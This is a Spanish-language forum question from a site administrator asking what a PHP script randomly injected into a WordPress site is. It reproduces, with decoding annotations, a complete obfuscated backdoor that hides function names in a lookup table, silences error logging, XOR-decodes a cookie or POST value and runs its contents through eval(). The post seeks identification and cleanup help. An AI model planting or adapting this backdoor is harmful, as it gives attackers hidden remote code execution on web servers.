Script aleatorio inyectado en un proyecto WordPress [duplicado]


Recientemente, en un sitio web en WordPress alojado en el servidor de mi cliente aparece de forma aleatoria el siguiente script. ¿Alguien conoce este patrón de virus / malware / exploit o algo así?

<?php $GLOBALS['c851bc'] = "\x54\x50\x56\x6a\x77\x3a\x5e\x6e\x2c\x43\x2f\x3c\x61\x59\x25\x28\x4e\x5b\x38\x5f\x53\x6b\x41\x2a\x5d\x62\x4d\x75\x51\x68\x60\x5c\x31\x30\x44\x7a\x21\x78\x29\x5a\x3d\x47\x42\x36\x2e\x49\x34\x6d\x79\x69\x7b\x4f\x76\x7d\x20\x32\x57\x46\x2d\xd\x73\x4c\x74\x33\x27\x23\x39\x7e\x58\x35\x26\x3e\x55\x45\x67\x72\xa\x2b\x52\x24\x71\x37\x70\x40\x64\x63\x3f\x4b\x22\x66\x65\x7c\x3b\x4a\x6f\x48\x9\x6c";
// NOTE(review): this file is an obfuscated PHP backdoor, annotated here for triage.
// The string above is a 98-character lookup table. Every identifier and literal
// below is assembled one character at a time by indexing into it, so no PHP
// function name appears in clear text for a plain-text search to match.
// The decoded value of each statement is given in the comment above it.
// Useful structural indicators: a hex-escaped string assigned to a random-looking
// $GLOBALS key on the opening line, followed by long runs of
// $GLOBALS[$GLOBALS['...'][n].$GLOBALS['...'][n]...] and a bare eval() near the end.

// --- Alias table: builtin function names stored under random-looking global keys ---
// $GLOBALS['vdfdc6'] = 'chr'
$GLOBALS[$GLOBALS['c851bc'][52].$GLOBALS['c851bc'][84].$GLOBALS['c851bc'][89].$GLOBALS['c851bc'][84].$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][43]] = $GLOBALS['c851bc'][85].$GLOBALS['c851bc'][29].$GLOBALS['c851bc'][75];
// $GLOBALS['wcf8463'] = 'ord'
$GLOBALS[$GLOBALS['c851bc'][4].$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][89].$GLOBALS['c851bc'][18].$GLOBALS['c851bc'][46].$GLOBALS['c851bc'][43].$GLOBALS['c851bc'][63]] = $GLOBALS['c851bc'][94].$GLOBALS['c851bc'][75].$GLOBALS['c851bc'][84];
// $GLOBALS['v4ef9'] = 'strlen'
$GLOBALS[$GLOBALS['c851bc'][52].$GLOBALS['c851bc'][46].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][89].$GLOBALS['c851bc'][66]] = $GLOBALS['c851bc'][60].$GLOBALS['c851bc'][62].$GLOBALS['c851bc'][75].$GLOBALS['c851bc'][97].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][7];
// $GLOBALS['i757decb'] = 'ini_set'
$GLOBALS[$GLOBALS['c851bc'][49].$GLOBALS['c851bc'][81].$GLOBALS['c851bc'][69].$GLOBALS['c851bc'][81].$GLOBALS['c851bc'][84].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][25]] = $GLOBALS['c851bc'][49].$GLOBALS['c851bc'][7].$GLOBALS['c851bc'][49].$GLOBALS['c851bc'][19].$GLOBALS['c851bc'][60].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][62];
// $GLOBALS['ue8054'] = 'serialize'
$GLOBALS[$GLOBALS['c851bc'][27].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][18].$GLOBALS['c851bc'][33].$GLOBALS['c851bc'][69].$GLOBALS['c851bc'][46]] = $GLOBALS['c851bc'][60].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][75].$GLOBALS['c851bc'][49].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][97].$GLOBALS['c851bc'][49].$GLOBALS['c851bc'][35].$GLOBALS['c851bc'][90];
// $GLOBALS['c3a0d'] = 'phpversion'
$GLOBALS[$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][63].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][33].$GLOBALS['c851bc'][84]] = $GLOBALS['c851bc'][82].$GLOBALS['c851bc'][29].$GLOBALS['c851bc'][82].$GLOBALS['c851bc'][52].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][75].$GLOBALS['c851bc'][60].$GLOBALS['c851bc'][49].$GLOBALS['c851bc'][94].$GLOBALS['c851bc'][7];
// $GLOBALS['c3b35a2ea'] = 'unserialize'
$GLOBALS[$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][63].$GLOBALS['c851bc'][25].$GLOBALS['c851bc'][63].$GLOBALS['c851bc'][69].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][55].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][12]] = $GLOBALS['c851bc'][27].$GLOBALS['c851bc'][7].$GLOBALS['c851bc'][60].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][75].$GLOBALS['c851bc'][49].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][97].$GLOBALS['c851bc'][49].$GLOBALS['c851bc'][35].$GLOBALS['c851bc'][90];
// $GLOBALS['gdf7442c'] = 'base64_decode'
$GLOBALS[$GLOBALS['c851bc'][74].$GLOBALS['c851bc'][84].$GLOBALS['c851bc'][89].$GLOBALS['c851bc'][81].$GLOBALS['c851bc'][46].$GLOBALS['c851bc'][46].$GLOBALS['c851bc'][55].$GLOBALS['c851bc'][85]] = $GLOBALS['c851bc'][25].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][60].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][43].$GLOBALS['c851bc'][46].$GLOBALS['c851bc'][19].$GLOBALS['c851bc'][84].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][94].$GLOBALS['c851bc'][84].$GLOBALS['c851bc'][90];
// $GLOBALS['q8ad'] = 'set_time_limit'
$GLOBALS[$GLOBALS['c851bc'][80].$GLOBALS['c851bc'][18].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][84]] = $GLOBALS['c851bc'][60].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][62].$GLOBALS['c851bc'][19].$GLOBALS['c851bc'][62].$GLOBALS['c851bc'][49].$GLOBALS['c851bc'][47].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][19].$GLOBALS['c851bc'][97].$GLOBALS['c851bc'][49].$GLOBALS['c851bc'][47].$GLOBALS['c851bc'][49].$GLOBALS['c851bc'][62];
// $GLOBALS['h5981'] = 'h624'  (the two-pass XOR helper defined later in this file)
$GLOBALS[$GLOBALS['c851bc'][29].$GLOBALS['c851bc'][69].$GLOBALS['c851bc'][66].$GLOBALS['c851bc'][18].$GLOBALS['c851bc'][32]] = $GLOBALS['c851bc'][29].$GLOBALS['c851bc'][43].$GLOBALS['c851bc'][55].$GLOBALS['c851bc'][46];
// $GLOBALS['nbc3'] = 'jb0ac'  (the repeating-key XOR routine defined later in this file)
$GLOBALS[$GLOBALS['c851bc'][7].$GLOBALS['c851bc'][25].$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][63]] = $GLOBALS['c851bc'][3].$GLOBALS['c851bc'][25].$GLOBALS['c851bc'][33].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][85];
// --- Request input captured under aliases, so the superglobal names appear only once ---
// $GLOBALS['kaa1'] = $_POST
$GLOBALS[$GLOBALS['c851bc'][21].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][32]] = $_POST;
// $GLOBALS['j7ab'] = $_COOKIE
$GLOBALS[$GLOBALS['c851bc'][3].$GLOBALS['c851bc'][81].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][25]] = $_COOKIE;
// --- Runtime settings; each call is prefixed with @ so a failure is not reported ---
// ini_set('error_log', NULL)
@$GLOBALS[$GLOBALS['c851bc'][49].$GLOBALS['c851bc'][81].$GLOBALS['c851bc'][69].$GLOBALS['c851bc'][81].$GLOBALS['c851bc'][84].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][25]]($GLOBALS['c851bc'][90].$GLOBALS['c851bc'][75].$GLOBALS['c851bc'][75].$GLOBALS['c851bc'][94].$GLOBALS['c851bc'][75].$GLOBALS['c851bc'][19].$GLOBALS['c851bc'][97].$GLOBALS['c851bc'][94].$GLOBALS['c851bc'][74], NULL);
// ini_set('log_errors', 0): turns PHP error logging off for this request
@$GLOBALS[$GLOBALS['c851bc'][49].$GLOBALS['c851bc'][81].$GLOBALS['c851bc'][69].$GLOBALS['c851bc'][81].$GLOBALS['c851bc'][84].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][25]]($GLOBALS['c851bc'][97].$GLOBALS['c851bc'][94].$GLOBALS['c851bc'][74].$GLOBALS['c851bc'][19].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][75].$GLOBALS['c851bc'][75].$GLOBALS['c851bc'][94].$GLOBALS['c851bc'][75].$GLOBALS['c851bc'][60], 0);
// ini_set('max_execution_time', 0): no execution time limit
@$GLOBALS[$GLOBALS['c851bc'][49].$GLOBALS['c851bc'][81].$GLOBALS['c851bc'][69].$GLOBALS['c851bc'][81].$GLOBALS['c851bc'][84].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][25]]($GLOBALS['c851bc'][47].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][37].$GLOBALS['c851bc'][19].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][37].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][27].$GLOBALS['c851bc'][62].$GLOBALS['c851bc'][49].$GLOBALS['c851bc'][94].$GLOBALS['c851bc'][7].$GLOBALS['c851bc'][19].$GLOBALS['c851bc'][62].$GLOBALS['c851bc'][49].$GLOBALS['c851bc'][47].$GLOBALS['c851bc'][90], 0);
// set_time_limit(0)
@$GLOBALS[$GLOBALS['c851bc'][80].$GLOBALS['c851bc'][18].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][84]](0);

// Later filled with the value ($y8b51) and the name ($l5bcd7) of one request parameter.
$y8b51 = NULL;
$l5bcd7 = NULL;

// $GLOBALS['h6393db'] = a 36-character, UUID-shaped string built from the table.
// It is used below both as the first XOR key and as the value the request must echo
// back in its 'ak' field. Presumably unique per infected file; the post says every
// injection uses different strings.
$GLOBALS[$GLOBALS['c851bc'][29].$GLOBALS['c851bc'][43].$GLOBALS['c851bc'][63].$GLOBALS['c851bc'][66].$GLOBALS['c851bc'][63].$GLOBALS['c851bc'][84].$GLOBALS['c851bc'][25]] = $GLOBALS['c851bc'][55].$GLOBALS['c851bc'][66].$GLOBALS['c851bc'][66].$GLOBALS['c851bc'][25].$GLOBALS['c851bc'][55].$GLOBALS['c851bc'][89].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][32].$GLOBALS['c851bc'][58].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][25].$GLOBALS['c851bc'][32].$GLOBALS['c851bc'][32].$GLOBALS['c851bc'][58].$GLOBALS['c851bc'][46].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][69].$GLOBALS['c851bc'][58].$GLOBALS['c851bc'][66].$GLOBALS['c851bc'][66].$GLOBALS['c851bc'][46].$GLOBALS['c851bc'][84].$GLOBALS['c851bc'][58].$GLOBALS['c851bc'][66].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][89].$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][55].$GLOBALS['c851bc'][18].$GLOBALS['c851bc'][18].$GLOBALS['c851bc'][25].$GLOBALS['c851bc'][46].$GLOBALS['c851bc'][18].$GLOBALS['c851bc'][85];
// Binds the plain name $h6393db to that global, so the later direct reads of
// $h6393db resolve to it even if this file is included from inside a function scope.
global $h6393db;

/**
 * Repeating-key XOR: combines each byte of $y8b51 with the corresponding byte of
 * $g0c13e, restarting at the beginning of $g0c13e whenever it is exhausted.
 * Applying it twice with the same key returns the original data, so the same
 * routine serves for both encoding and decoding.
 *
 * The builtins are reached through the alias table set up at the top of the file:
 * $GLOBALS['v4ef9'] is 'strlen', $GLOBALS['vdfdc6'] is 'chr', $GLOBALS['wcf8463'] is 'ord'.
 *
 * @param string $y8b51  data to transform
 * @param string $g0c13e key
 * @return string transformed data, same length as $y8b51
 */
function jb0ac($y8b51, $g0c13e)
{
    $j25b84da = "";

    // Outer loop: $e143 is the position in the data; it is only advanced by the inner loop.
    for ($e143=0; $e143<$GLOBALS[$GLOBALS['c851bc'][52].$GLOBALS['c851bc'][46].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][89].$GLOBALS['c851bc'][66]]($y8b51);)
    {
        // Inner loop: one pass over the key ($l6c2), stopping early when the data runs out.
        for ($l6c2=0; $l6c2<$GLOBALS[$GLOBALS['c851bc'][52].$GLOBALS['c851bc'][46].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][89].$GLOBALS['c851bc'][66]]($g0c13e) && $e143<$GLOBALS[$GLOBALS['c851bc'][52].$GLOBALS['c851bc'][46].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][89].$GLOBALS['c851bc'][66]]($y8b51); $l6c2++, $e143++)
        {
            // chr(ord(data byte) ^ ord(key byte))
            $j25b84da .= $GLOBALS[$GLOBALS['c851bc'][52].$GLOBALS['c851bc'][84].$GLOBALS['c851bc'][89].$GLOBALS['c851bc'][84].$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][43]]($GLOBALS[$GLOBALS['c851bc'][4].$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][89].$GLOBALS['c851bc'][18].$GLOBALS['c851bc'][46].$GLOBALS['c851bc'][43].$GLOBALS['c851bc'][63]]($y8b51[$e143]) ^ $GLOBALS[$GLOBALS['c851bc'][4].$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][89].$GLOBALS['c851bc'][18].$GLOBALS['c851bc'][46].$GLOBALS['c851bc'][43].$GLOBALS['c851bc'][63]]($g0c13e[$l6c2]));
        }
    }

    return $j25b84da;
}

/**
 * Two-pass XOR: transforms $y8b51 first with the file-wide key in $h6393db and
 * then with $g0c13e. $GLOBALS['nbc3'] holds the string 'jb0ac', so both calls
 * below go to the repeating-key XOR routine of that name.
 *
 * @param string $y8b51  data to transform
 * @param string $g0c13e second key (at the call site this is the request parameter name)
 * @return string transformed data
 */
function h624($y8b51, $g0c13e)
{
    // File-wide key assigned at top level through $GLOBALS['h6393db'].
    global $h6393db;

    // jb0ac(jb0ac($y8b51, $h6393db), $g0c13e)
    return $GLOBALS[$GLOBALS['c851bc'][7].$GLOBALS['c851bc'][25].$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][63]]($GLOBALS[$GLOBALS['c851bc'][7].$GLOBALS['c851bc'][25].$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][63]]($y8b51, $h6393db), $g0c13e);
}

// NOTE(review): request handler of the backdoor. It takes one request parameter,
// decodes it, checks an embedded key, and then either reports the PHP version or
// passes attacker-supplied text to eval(). A file containing this block gives whoever
// holds the key arbitrary PHP execution as the web server user; treat its presence
// as a compromise of the site. Removing the file does not address however it was
// written, and the post reports the script reappearing in random files.

// Walk $_COOKIE (aliased as $GLOBALS['j7ab']); after the loop $y8b51 / $l5bcd7 hold
// the value and name of the last cookie in the request.
foreach ($GLOBALS[$GLOBALS['c851bc'][3].$GLOBALS['c851bc'][81].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][25]] as $g0c13e=>$k0c0)
{
    $y8b51 = $k0c0;
    $l5bcd7 = $g0c13e;
}

// No usable cookie value: fall back to $_POST (aliased as $GLOBALS['kaa1']), again
// keeping the last field.
if (!$y8b51)
{
    foreach ($GLOBALS[$GLOBALS['c851bc'][21].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][32]] as $g0c13e=>$k0c0)
    {
        $y8b51 = $k0c0;
        $l5bcd7 = $g0c13e;
    }
}

// Decoded: $y8b51 = @unserialize(h624(base64_decode($y8b51), $l5bcd7));
// i.e. base64-decode the parameter value, XOR it with the file-wide key and then with
// the parameter's own name, and unserialize the result. unserialize() on request data
// is an object-injection risk in its own right; the @ hides the notice raised when an
// ordinary visitor's cookie does not decode.
$y8b51 = @$GLOBALS[$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][63].$GLOBALS['c851bc'][25].$GLOBALS['c851bc'][63].$GLOBALS['c851bc'][69].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][55].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][12]]($GLOBALS[$GLOBALS['c851bc'][29].$GLOBALS['c851bc'][69].$GLOBALS['c851bc'][66].$GLOBALS['c851bc'][18].$GLOBALS['c851bc'][32]]($GLOBALS[$GLOBALS['c851bc'][74].$GLOBALS['c851bc'][84].$GLOBALS['c851bc'][89].$GLOBALS['c851bc'][81].$GLOBALS['c851bc'][46].$GLOBALS['c851bc'][46].$GLOBALS['c851bc'][55].$GLOBALS['c851bc'][85]]($y8b51), $l5bcd7));
// Gate: the decoded array must carry an 'ak' entry equal to the file-wide key.
// Requests that fail this check fall through, so the page behaves normally for
// ordinary visitors.
if (isset($y8b51[$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][21]]) && $h6393db==$y8b51[$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][21]])
{
    // Action 'i' ($y8b51['a'] == 'i'): information probe.
    if ($y8b51[$GLOBALS['c851bc'][12]] == $GLOBALS['c851bc'][49])
    {
        // Decoded: array('pv' => @phpversion(), 'sv' => '1.0-1')
        // 'sv' is presumably the backdoor's own version string.
        $e143 = Array(
            $GLOBALS['c851bc'][82].$GLOBALS['c851bc'][52] => @$GLOBALS[$GLOBALS['c851bc'][85].$GLOBALS['c851bc'][63].$GLOBALS['c851bc'][12].$GLOBALS['c851bc'][33].$GLOBALS['c851bc'][84]](),
            $GLOBALS['c851bc'][60].$GLOBALS['c851bc'][52] => $GLOBALS['c851bc'][32].$GLOBALS['c851bc'][44].$GLOBALS['c851bc'][33].$GLOBALS['c851bc'][58].$GLOBALS['c851bc'][32],
        );
        // Decoded: echo @serialize($e143);
        echo @$GLOBALS[$GLOBALS['c851bc'][27].$GLOBALS['c851bc'][90].$GLOBALS['c851bc'][18].$GLOBALS['c851bc'][33].$GLOBALS['c851bc'][69].$GLOBALS['c851bc'][46]]($e143);
    }
    // Action 'e' ($y8b51['a'] == 'e'): execute.
    elseif ($y8b51[$GLOBALS['c851bc'][12]] == $GLOBALS['c851bc'][90])
    {
        // Decoded: eval($y8b51['d']); runs the 'd' field of the request as PHP code.
        // This is the only function call in the file written in clear text.
        eval($y8b51[$GLOBALS['c851bc'][84]]);
    }
    // An authenticated request ends here, before the rest of the host file runs.
    exit();
    // NOTE(review): the listing in the post is cut off at this point; the closing
    // brace of the outer if is not shown.

Información:

uname -a
Linux 2.6.32-504.8.1.el6.x86_64 #1 SMP Wed Jan 28 21:11:36 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

PHP 5.4.37
WordPress en la última versión estable

Aparentemente es una inyección de scripts, pero aparece en archivos aleatorios y siempre en carpetas diferentes. No hay ningún patrón en los nombres de las cadenas: cada inyección usa cadenas con nombres distintos.

    
pregunta Rafael Soufraz 23.10.2015 - 22:24

0 respuestas
